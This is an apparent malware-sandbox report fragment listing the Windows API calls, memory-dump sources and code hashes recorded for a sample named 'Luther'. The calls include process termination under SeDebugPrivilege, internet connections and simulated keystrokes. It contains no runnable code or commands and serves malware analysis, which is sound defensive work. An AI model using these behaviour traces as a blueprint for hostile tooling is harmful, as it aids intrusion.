                                                                                                          • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00EC5C6F
                                                                                                            • Part of subcall function 00EC79F2: DeleteObject.GDI32(00000000), ref: 00EC7A1E
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00EC5CAB
                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EC5CB8
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EC5CEB
                                                                                                          • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00EC5D25
                                                                                                          • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00EC5D34
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                          • String ID:
                                                                                                          • API String ID: 3210457359-0
                                                                                                          • Opcode ID: b20056e894f53da9341cd14ba617d382f4cee74a91d7d9d2f926387edc790f56
                                                                                                          • Instruction ID: 34eb672863ed21f29f59ce83993d3ab6c37f9432f92e3137433de6baccece6e8
                                                                                                          • Opcode Fuzzy Hash: b20056e894f53da9341cd14ba617d382f4cee74a91d7d9d2f926387edc790f56
                                                                                                          • Instruction Fuzzy Hash: 1651AE36640B08BFEF249B14CD49FD97FA1AB04354F14611AB925BA1E0C773B9C2DB41
                                                                                                          APIs
                                                                                                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00E728D1
                                                                                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00E728EA
                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E728FA
                                                                                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00E72912
                                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E72933
                                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E311F5,00000000,00000000,00000000,000000FF,00000000), ref: 00E72942
                                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E7295F
                                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E311F5,00000000,00000000,00000000,000000FF,00000000), ref: 00E7296E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 1268354404-0
                                                                                                          • Opcode ID: 6c15d8295b24bac5f3dcb0c65276fa2073a14b95ec1416cfe5cc8d10f06a1973
                                                                                                          • Instruction ID: 5bf4a412047b7e25bd8cfdb0cdc4515801d33dbde720896baafcea24200cfe99
                                                                                                          • Opcode Fuzzy Hash: 6c15d8295b24bac5f3dcb0c65276fa2073a14b95ec1416cfe5cc8d10f06a1973
                                                                                                          • Instruction Fuzzy Hash: 57515A30600209AFDB24CF25CC49FAA7BB5FF88714F10952DFA56A72A0D771E991EB50
                                                                                                          APIs
                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EACBC7
                                                                                                          • GetLastError.KERNEL32 ref: 00EACBDA
                                                                                                          • SetEvent.KERNEL32(?), ref: 00EACBEE
                                                                                                            • Part of subcall function 00EACC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EACCB7
                                                                                                            • Part of subcall function 00EACC98: GetLastError.KERNEL32 ref: 00EACD67
                                                                                                            • Part of subcall function 00EACC98: SetEvent.KERNEL32(?), ref: 00EACD7B
                                                                                                            • Part of subcall function 00EACC98: InternetCloseHandle.WININET(00000000), ref: 00EACD86
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 337547030-0
                                                                                                          • Opcode ID: e10c7a517b85a1888144fe1ea4aff90275ab807bb1378da01ee97c524924c7f7
                                                                                                          • Instruction ID: 4bd22cae70a3e5a366d96966fe28e81515fb43c7a45e19372c87cb126830797f
                                                                                                          • Opcode Fuzzy Hash: e10c7a517b85a1888144fe1ea4aff90275ab807bb1378da01ee97c524924c7f7
                                                                                                          • Instruction Fuzzy Hash: E131A171104701AFDB218F75CD44AABBBF8FF49314B20553DF85AAA610CB32E815EB60
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E94393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E943AD
                                                                                                            • Part of subcall function 00E94393: GetCurrentThreadId.KERNEL32 ref: 00E943B4
                                                                                                            • Part of subcall function 00E94393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E92F00), ref: 00E943BB
                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E92F0A
                                                                                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E92F28
                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00E92F2C
                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E92F36
                                                                                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E92F4E
                                                                                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00E92F52
                                                                                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E92F5C
                                                                                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E92F70
                                                                                                          • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00E92F74
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2014098862-0
                                                                                                          • Opcode ID: 8faa4630f6649e6deb3b2a44778bb125568d30de7cc01d2ba3ddf61f72596c5f
                                                                                                          • Instruction ID: b2e95944382d086611bd5e42e37f2f9abf5d744c2b6b92470ef6c3edd55ee737
                                                                                                          • Opcode Fuzzy Hash: 8faa4630f6649e6deb3b2a44778bb125568d30de7cc01d2ba3ddf61f72596c5f
                                                                                                          • Instruction Fuzzy Hash: 3201D870788214BFFF1067699C8AF593F99DB4DB11F110025F358BE1E0C9E35445CAA9
                                                                                                          APIs
                                                                                                          • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00E91D95,?,?,00000000), ref: 00E92159
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00E91D95,?,?,00000000), ref: 00E92160
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E91D95,?,?,00000000), ref: 00E92175
                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,?,00E91D95,?,?,00000000), ref: 00E9217D
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00E91D95,?,?,00000000), ref: 00E92180
                                                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E91D95,?,?,00000000), ref: 00E92190
                                                                                                          • GetCurrentProcess.KERNEL32(00E91D95,00000000,?,00E91D95,?,?,00000000), ref: 00E92198
                                                                                                          • DuplicateHandle.KERNEL32(00000000,?,00E91D95,?,?,00000000), ref: 00E9219B
                                                                                                          • CreateThread.KERNEL32(00000000,00000000,00E921C1,00000000,00000000,00000000), ref: 00E921B5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 1957940570-0
                                                                                                          • Opcode ID: 57b4b98cd9f11203aceaa45a7ae39ae00c6c579b840a50087c5547dfa0db5bf6
                                                                                                          • Instruction ID: 3177b8ab5e9b18f8f1f74fe1c990a7d4cede4e9c044daa082de1caa0bac91485
                                                                                                          • Opcode Fuzzy Hash: 57b4b98cd9f11203aceaa45a7ae39ae00c6c579b840a50087c5547dfa0db5bf6
                                                                                                          • Instruction Fuzzy Hash: DC01CDB5245344BFEB10AFA6DC4DF6B7BACEB88711F054425FA05EB1A1CA729805CB30
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E9DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00E9DDAC
                                                                                                            • Part of subcall function 00E9DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00E9DDBA
                                                                                                            • Part of subcall function 00E9DD87: CloseHandle.KERNEL32(00000000), ref: 00E9DE87
                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EBABCA
                                                                                                          • GetLastError.KERNEL32 ref: 00EBABDD
                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EBAC10
                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EBACC5
                                                                                                          • GetLastError.KERNEL32(00000000), ref: 00EBACD0
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00EBAD21
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                          • String ID: SeDebugPrivilege
                                                                                                          • API String ID: 2533919879-2896544425
                                                                                                          • Opcode ID: cd7b5891ec4a885c7e203643cd4356202362a94d2c5291e2d245de68f7da8427
                                                                                                          • Instruction ID: 441be8a1ed804b89e11bca363c440bc11b0d17bd74a909eacf9d7a70495a7ea3
                                                                                                          • Opcode Fuzzy Hash: cd7b5891ec4a885c7e203643cd4356202362a94d2c5291e2d245de68f7da8427
                                                                                                          • Instruction Fuzzy Hash: 9D61C3702086419FDB20DF15C499F66BBE1AF44308F5894ACE4656B7A3C772EC49CB92
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EC43C1
                                                                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00EC43D6
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EC43F0
                                                                                                          • _wcslen.LIBCMT ref: 00EC4435
                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00EC4462
                                                                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EC4490
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window_wcslen
                                                                                                          • String ID: SysListView32
                                                                                                          • API String ID: 2147712094-78025650
                                                                                                          • Opcode ID: 3bc0dcb1aa58f5e17a095eaeb6ec2c29c17d90f8d7fdad5a25cc2382918f7665
                                                                                                          • Instruction ID: 8413ae3681c101f3724070e6841854296ca5a70bfe463263742073b0c6689035
                                                                                                          • Opcode Fuzzy Hash: 3bc0dcb1aa58f5e17a095eaeb6ec2c29c17d90f8d7fdad5a25cc2382918f7665
                                                                                                          • Instruction Fuzzy Hash: 4041DEB1A00308ABDF219F64CD49FEA7BA9FB48354F10112AF954F72D1D7729981DB90
                                                                                                          APIs
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E9C6C4
                                                                                                          • IsMenu.USER32(00000000), ref: 00E9C6E4
                                                                                                          • CreatePopupMenu.USER32 ref: 00E9C71A
                                                                                                          • GetMenuItemCount.USER32(01085C68), ref: 00E9C76B
                                                                                                          • InsertMenuItemW.USER32(01085C68,?,00000001,00000030), ref: 00E9C793
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                          • String ID: 0$2
                                                                                                          • API String ID: 93392585-3793063076
                                                                                                          • Opcode ID: 53c7676d8e9ca8797be29c8ee309ed8b77032378c69523be8acc70f124985178
                                                                                                          • Instruction ID: 6af3007d7bb774823bbef2e12f2f2710f36aea714f9d967e9a19e091458436fd
                                                                                                          • Opcode Fuzzy Hash: 53c7676d8e9ca8797be29c8ee309ed8b77032378c69523be8acc70f124985178
                                                                                                          • Instruction Fuzzy Hash: 30518C70600205ABDF10EFB8D9C4BAEBBF4AF59318F34512AE911B7291D3719945CF61
                                                                                                          APIs
                                                                                                          • LoadIconW.USER32(00000000,00007F03), ref: 00E9D1BE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconLoad
                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                          • API String ID: 2457776203-404129466
                                                                                                          • Opcode ID: ac6f83256fd2955ed757d288627515ec5ba946c40e9988a5b0e837699cb4bd0b
                                                                                                          • Instruction ID: 972f6f91cd0751b49e01e2c8e761a470fd4b41e8aab5023d567b4d2f7b84f7a8
                                                                                                          • Opcode Fuzzy Hash: ac6f83256fd2955ed757d288627515ec5ba946c40e9988a5b0e837699cb4bd0b
                                                                                                          • Instruction Fuzzy Hash: 0E11DA7725D32ABEEB055B56DC82DBA77EC9F05769B20202AF900B61C1E7B55A404260
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                          • String ID: 0.0.0.0
                                                                                                          • API String ID: 642191829-3771769585
                                                                                                          • Opcode ID: 12b783726205dd86d3a7b80ef83f6cf5eef78894a85cf59c5ccf2943705b33b3
                                                                                                          • Instruction ID: 13f847486bf875b15831e243a3f4c7e361e745cf3022c6cc9beebac65783b564
                                                                                                          • Opcode Fuzzy Hash: 12b783726205dd86d3a7b80ef83f6cf5eef78894a85cf59c5ccf2943705b33b3
                                                                                                          • Instruction Fuzzy Hash: F31124728041147FDF24A7A0DC4AFEAB7ACDF40315F0010BAFA01B2091EE728A868661
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$LocalTime
                                                                                                          • String ID:
                                                                                                          • API String ID: 952045576-0
                                                                                                          • Opcode ID: 9632a1bad9803ac99430e15185bb4590955f72bdec0e277cf10c1597a45fbd34
                                                                                                          • Instruction ID: 8e4d09f54b781c67560ef23dd1148651d3895856869369b8e3d15e64372eae39
                                                                                                          • Opcode Fuzzy Hash: 9632a1bad9803ac99430e15185bb4590955f72bdec0e277cf10c1597a45fbd34
                                                                                                          • Instruction Fuzzy Hash: 64419565C11114B9DB11EBF8CC86ACFB7E8AF05311F50A862F918F3161FA74D259C3A6
                                                                                                          APIs
                                                                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E739E2,00000004,00000000,00000000), ref: 00E4FC41
                                                                                                          • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00E739E2,00000004,00000000,00000000), ref: 00E8FC15
                                                                                                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E739E2,00000004,00000000,00000000), ref: 00E8FC98
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ShowWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1268545403-0
                                                                                                          • Opcode ID: eda0811eeb3a66773bdd2ed8cfd9236a054de79c36e188c2026619d3be22eedc
                                                                                                          • Instruction ID: 55ef05b96a36bdc182748c9cb1200deb5a3fc316036bc6b07b926fbef40b44b5
                                                                                                          • Opcode Fuzzy Hash: eda0811eeb3a66773bdd2ed8cfd9236a054de79c36e188c2026619d3be22eedc
                                                                                                          • Instruction Fuzzy Hash: F8414A3060838C9EC7349B39E9CCB69FBD2AB46B15F14743DE94F76A60C632A840D718
                                                                                                          APIs
                                                                                                          • DeleteObject.GDI32(00000000), ref: 00EC37B7
                                                                                                          • GetDC.USER32(00000000), ref: 00EC37BF
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EC37CA
                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00EC37D6
                                                                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EC3812
                                                                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EC3823
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EC6504,?,?,000000FF,00000000,?,000000FF,?), ref: 00EC385E
                                                                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EC387D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3864802216-0
                                                                                                          • Opcode ID: 2bc76e5e8c16dc4cc01253d032e400616947607c7a43e865dc8732cc9291dc6a
                                                                                                          • Instruction ID: 1ba9a94d032efeb7687e26b83f60dedba699d2081136a128b4de865142be4c6b
                                                                                                          • Opcode Fuzzy Hash: 2bc76e5e8c16dc4cc01253d032e400616947607c7a43e865dc8732cc9291dc6a
                                                                                                          • Instruction Fuzzy Hash: FF3191721052147FEB154F55DC49FEB3BA9EF49715F044069FE08AA191C6B69C42C7A0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                          • API String ID: 0-572801152
                                                                                                          • Opcode ID: 5ae1d0667846513943e6b2e5673b6efc2e48f34edad170762c3cfa2f344c4506
                                                                                                          • Instruction ID: 650f7de2038ee8f387f4d48260bb1bdf4844e327c95f39716df0f668135df49a
                                                                                                          • Opcode Fuzzy Hash: 5ae1d0667846513943e6b2e5673b6efc2e48f34edad170762c3cfa2f344c4506
                                                                                                          • Instruction Fuzzy Hash: 4BD18B72A0060A9FDF10CFA8C885BEEB7B5BF48308F149569E915BB290E771ED45CB50
                                                                                                          APIs
